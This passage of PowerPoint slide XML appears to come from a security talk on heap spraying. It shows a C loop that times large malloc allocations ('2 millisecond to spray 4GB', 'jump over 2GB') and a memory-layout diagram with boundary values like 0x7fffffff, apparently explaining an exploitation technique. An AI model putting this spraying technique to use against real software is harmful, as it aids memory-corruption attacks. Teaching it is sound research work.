                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(size);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"chunk : %p\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>chunk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x100);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"done!\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a: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altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>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dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>malloc_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>time_script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>chunk : 0x7f9770d4e010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>chunk : 0x7f96f0d4d010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1438</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> microsecond elapsed</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279917" y="1825625"/>
            <a:ext cx="5617029" cy="4855093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2 millisecond to spray 4GB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This is all we need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jump over 2GB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540761" y="6207949"/>
            <a:ext cx="2323321" cy="233265"/>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9" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344815" y="5010540"/>
            <a:ext cx="5847185" cy="0"/>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8837464"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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21069" y="3197677"/>
            <a:ext cx="8384955"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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834357" y="3458073"/>
            <a:ext cx="445062" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279419" y="3197677"/>
            <a:ext cx="0" cy="890124"/>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824159" y="3197677"/>
            <a:ext cx="0" cy="890124"/>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92708" y="3458073"/>
            <a:ext cx="445062" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2951058" y="3458073"/>
            <a:ext cx="789668" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3817068" y="3197677"/>
            <a:ext cx="0" cy="890124"/>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837446" y="3458072"/>
            <a:ext cx="493149" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>d1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4371250" y="3197676"/>
            <a:ext cx="0" cy="890124"/>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360592" y="3458073"/>
            <a:ext cx="1311353" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x3fffc000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504608" y="3197676"/>
            <a:ext cx="0" cy="890124"/>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646853" y="3458073"/>
            <a:ext cx="445062" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6054211" y="3197676"/>
            <a:ext cx="0" cy="890124"/>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6175453" y="3458073"/>
            <a:ext cx="789668" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6594540" y="3197676"/>
            <a:ext cx="0" cy="890124"/>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6629502" y="3458072"/>
            <a:ext cx="450569" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>d2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7111487" y="3197676"/>
            <a:ext cx="0" cy="890124"/>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7126958" y="3458072"/>
            <a:ext cx="1064385" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7fffffff</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8191343" y="3197676"/>
            <a:ext cx="0" cy="890124"/>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8292736" y="3458072"/>
            <a:ext cx="445062" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8737798" y="3197676"/>
            <a:ext cx="0" cy="890124"/>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834681" y="3445342"/>
            <a:ext cx="789668" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9541361" y="3184946"/>
            <a:ext cx="0" cy="890124"/>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9594511" y="3441563"/>
            <a:ext cx="453490" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>d3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1780152" y="4186500"/>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4291399" y="4186622"/>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2622726" y="4251337"/>
            <a:ext cx="911825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 1</a:t>
            </a:r>
